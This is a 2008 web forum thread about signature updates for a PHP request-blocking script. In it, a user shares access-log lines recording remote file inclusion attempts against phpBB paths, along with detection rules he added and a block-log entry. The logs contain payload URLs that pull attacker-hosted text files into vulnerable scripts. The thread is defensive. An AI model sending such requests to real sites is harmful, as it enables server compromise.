Zaphod's Deepest Thought Forum Index
RegisterSearchFAQMemberlistUsergroupsLog in
Signature Update 11

 
This topic is locked: you cannot edit posts or make replies.    Zaphod's Deepest Thought Forum Index » Signature Data View previous topic
View next topic
Signature Update 11
Author Message
zaphod
Site Admin

Joined: 28 Jan 2008
Posts: 75

Post Signature Update 11 Reply with quote
Added SEVERAL new detections...

Including one for a common perl hack.

Get it here!

Zap Smile
Tue Dec 16, 2008 11:26 am View user's profile Send private message
diabolic.bg

Joined: 30 Nov 2008
Posts: 30
Location: Bulgaria

Post Reply with quote
Hi, Zap!
Maybe you must correct something in the new signatures. I have update it in 20.55 Bulgarian time.
Later I seen two attackers
Quote:
190.24.131.38 - - [16/Dec/2008:23:22:52 +0200] "GET /admin_styles.php?phpbb_root_path=http://www.miresici.ro/users/mmid.txt????? HTTP/1.1" 404 1120 "-" "libwww-perl/5.805"

190.24.131.38 - - [16/Dec/2008:23:22:52 +0200] "GET /phpbb2/archive/admin_styles.php?phpbb_root_path=http://www.miresici.ro/users/mmid.txt????? HTTP/1.1" 404 1120 "-" "libwww-perl/5.805"

190.24.131.38 - - [16/Dec/2008:23:22:52 +0200] "GET /phpbb2/archive/urllist.txt/admin_styles.php?phpbb_root_path=http://www.miresici.ro/users/mmid.txt????? HTTP/1.1" 404 1120 "-" "libwww-perl/5.805"

66.7.199.184 - - [16/Dec/2008:23:26:05 +0200] "GET /phpbb2/archive/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://oursoultvxq.com/bbs/data/vip/id2.txt??? HTTP/1.1" 404 1120 "-" "libwww-perl/5.811"

66.7.199.184 - - [16/Dec/2008:23:26:05 +0200] "GET /phpbb2/archive/urllist.txt/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://oursoultvxq.com/bbs/data/vip/id2.txt??? HTTP/1.1" 404 1120 "-" "libwww-perl/5.811"

66.7.199.184 - - [16/Dec/2008:23:26:05 +0200] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://oursoultvxq.com/bbs/data/vip/id2.txt??? HTTP/1.1" 404 1120 "-" "libwww-perl/5.811"

but zblock don't stopped no one. Confused If you want, see http://wasteland-bg.com/zbblock/killed_log.txt I don't clear it from two days.
I have added
Code:
+ (inmatch($query,"error=","remote file include attack"));
+ (inmatch($query,"[phpbb_root_path]","phpbb hack"));
+ (inmatch($query,"[modules]","phpbb hack"));
+ (inmatch($query,"[forums]","phpbb hack"));


for my site. Nobody don't needs from my phpbb_root_path, and I don't have folders modules and forums but it maybe will forced zblock. Wink
I have added also two files errors.php as already tell you before. And already have the first result:

Code:
@: Wed, 17 Dec 2008 12:50:55 +0200
Host: linux21.dnsprimario.com
IP: 86.109.170.56
Why blocked: remote file include attack
File:
Query: error=http://rubii.t35.com/super-id.txt???
Referer:
Reconstructed URL: http://wasteland-bg.com/errors.php?error=http://rubii.t35.com/super-id.txt???


P.S. Maybe here some topics must be viewed only for registered users for security?[quote]

_________________
Fallout Vault BG | Vault Tec RSS News
Wed Dec 17, 2008 1:57 am View user's profile Send private message Visit poster's website
Display posts from previous:    
This topic is locked: you cannot edit posts or make replies.    Zaphod's Deepest Thought Forum Index » Signature Data All times are GMT - 7 Hours
Page 1 of 1

 
Jump to: 
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum


Powered by phpBB © 2001, 2005 phpBB Group
Design by Vjacheslav Trushkin / Easy Tutorials (Photoshop Tutorials).